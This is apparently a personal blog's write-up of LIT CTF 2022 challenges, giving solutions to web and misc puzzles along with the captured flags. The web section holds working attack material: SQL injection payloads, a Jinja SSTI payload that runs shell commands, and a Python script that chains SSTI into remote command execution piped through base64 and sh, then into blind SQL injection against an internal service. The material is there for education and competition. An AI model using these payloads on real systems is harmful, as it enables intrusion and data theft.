xiosec
Posts Tags Categories
xiosec

Contents

LIT CTF 2022

 included in CTF security writeup
   638 words   3 minutes 

LIT(Lexington Informatics Tournament) is a competitive programming tournament for middle/high school students, hosted by members of the LexMACS club along with many guest problemsetters/testers.

Web

  • Guess The Pokemon
  • Kevin’s Cookies
  • EYANGCH Fan Art Maker
  • Flushed Emoji

Guess The Pokemon

If you check the code, you will see that there is a sql injection vulnerability in it

1

cur.execute("SELECT * FROM pokemon WHERE names=" + name + "")

payload

1

1 OR 1=1--

1

LITCTF{flagr3l4t3dt0pok3m0n0rsom3th1ng1dk}

Kevin’s Cookies

In cookies, there is a key called likeCookie whose value is false. If we change the value to true, we will see the following message.

1
2

Oh silly you. What do you mean you like a true cookie?
I have 20 cookies numbered from 1 to 20, and all of them are made from super true authentic recipes.

script

1
2
3
4
5
6
7
8
9

import requests

url = "http://litctf.live:31778/"

for i in range(20):
	r = requests.get(url, cookies={"likeCookie":str(i)})
	if "LITCTF{" in r.text:
		print("likeCookie : ", i)
		break

1

LITCTF{Bd1mens10n_15_l1k3_sup3r_dup3r_0rzzzz}

EYANGCH Fan Art Maker

In this challenge, we only need to change the location of the flag component

1

<flag x="200" y="450"></flag>

1

LITCTF{wh4t_d03s_CH_1n_EyangCH_m3an???}

Flushed Emoji

This challenge has several vulnerabilities. The first vulnerability is related to the password field. If you check the code, you will notice the vulnerability of SSTI

1

return render_template_string("ok thank you for your info i have now sold your password (" + password + ") for 2 donuts :)");

For example, if you enter the following payload

1
2
3

{{2+2}}

4

There is also a sql injection vulnerability in the data-server project

1

x = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"

Now we use SSTI to execute command

1

{{config['__class__']['__init__']['__globals__']['os']|attr('popen')('ls')|attr('read')()}}

1
2
3
4
5
6
7
8
9

curl -X POST "http://litctf.live:31781" -d "username=&password={{config['__class__']['__init__']['__globals__']['os']|attr('popen')('ls')|attr('read')()}}"


ok thank you for your info i have now sold your password (main.py
requirements.txt
run.sh
static
templates
) for 2 donuts :)

If we print the main.py file, we will encounter the address http://172.24.0.8:8080/runquery, this address is not accessible from the outside, and this shows that we do not have access to the data-server program from the outside.

In the next step, we should send requests containing sql to the address http://172.24.0.8:8080/runquery

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

import requests
import base64

char = list(".*+,!#$%&0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-{}")

url = "http://litctf.live:31781"
internal_url = "http://172.24.0.8:8080/runquery"

ssti_payload  = "{{config['__class__']['__init__']['__globals__']['os']|attr('popen')('%s')|attr('read')()}}"
rce_payload   = "echo {}| base64 -d | sh"
python_script = "python3 -c \"import json,requests;print(requests.post('%s', data=json.dumps({'username':'%s','password':'0'}), headers={\\\"Content-type\\\": \\\"application/json\\\"}).text)\""
sql_payload   = "flag\\'and (Select hex(substr(password,1,{})) from users limit 1 offset 0) = hex(\\\'{}\\\')--"

flag = "LITCTF{"

for c in range(len(char)):
	for i in range(len(char)):
		tmp = flag+char[i]
		
		script = python_script % (internal_url, sql_payload.format(len(flag)+1,tmp))
		script = str(base64.b64encode(script.encode("utf-8")), "utf-8")
		payload = ssti_payload % rce_payload.format(script)
		
		r = requests.post(url, data={"username":"","password":payload})
		if "True" in r.text:
			flag += char[i]
			print("FLAG : "+ flag)
			break
  • There are a few points in the script above
    • Because there is no curl in the server, we had to use a python script to send the request.
    • The server filters the character “.” , to bypass this filter I coded the script with base64.

/assets/post/LITCTF2022/FlushedEmoji.png

misc

  • CodeTiger orz Is Meta
  • kirby!!!

CodeTiger orz Is Meta

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

strings ./codetigerfanpic.png

<x:xmpmeta xmlns:x='adobe:ns:meta/' x:xmptk='Image::ExifTool 12.36'>
<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>
 <rdf:Description rdf:about=''
  xmlns:dc='http://purl.org/dc/elements/1.1/'>
  <dc:description>
   <rdf:Alt>
    <rdf:li xml:lang='x-default'>t1g2r_</rdf:li>
   </rdf:Alt>
  </dc:description>
  <dc:rights>
   <rdf:Alt>
    <rdf:li xml:lang='x-default'>orz}</rdf:li>
   </rdf:Alt>
  </dc:rights>
  <dc:title>
   <rdf:Alt>
    <rdf:li xml:lang='x-default'>LITCTF{c0de_</rdf:li>
   </rdf:Alt>
  </dc:title>
 </rdf:Description>
</rdf:RDF>
</x:xmpmeta>
<?xpacket end='r'?>

1

LITCTF{c0de_t1g2r_orz}

kirby!!!

This challenge contains a sound file that I opened with sonic visualizer and added the spectrogram layer

/assets/post/LITCTF2022/kirby.png

1

LITCTF{K1RBY1SCOOL!}
Updated on 2022-07-25
 voynichCTF
Back | Home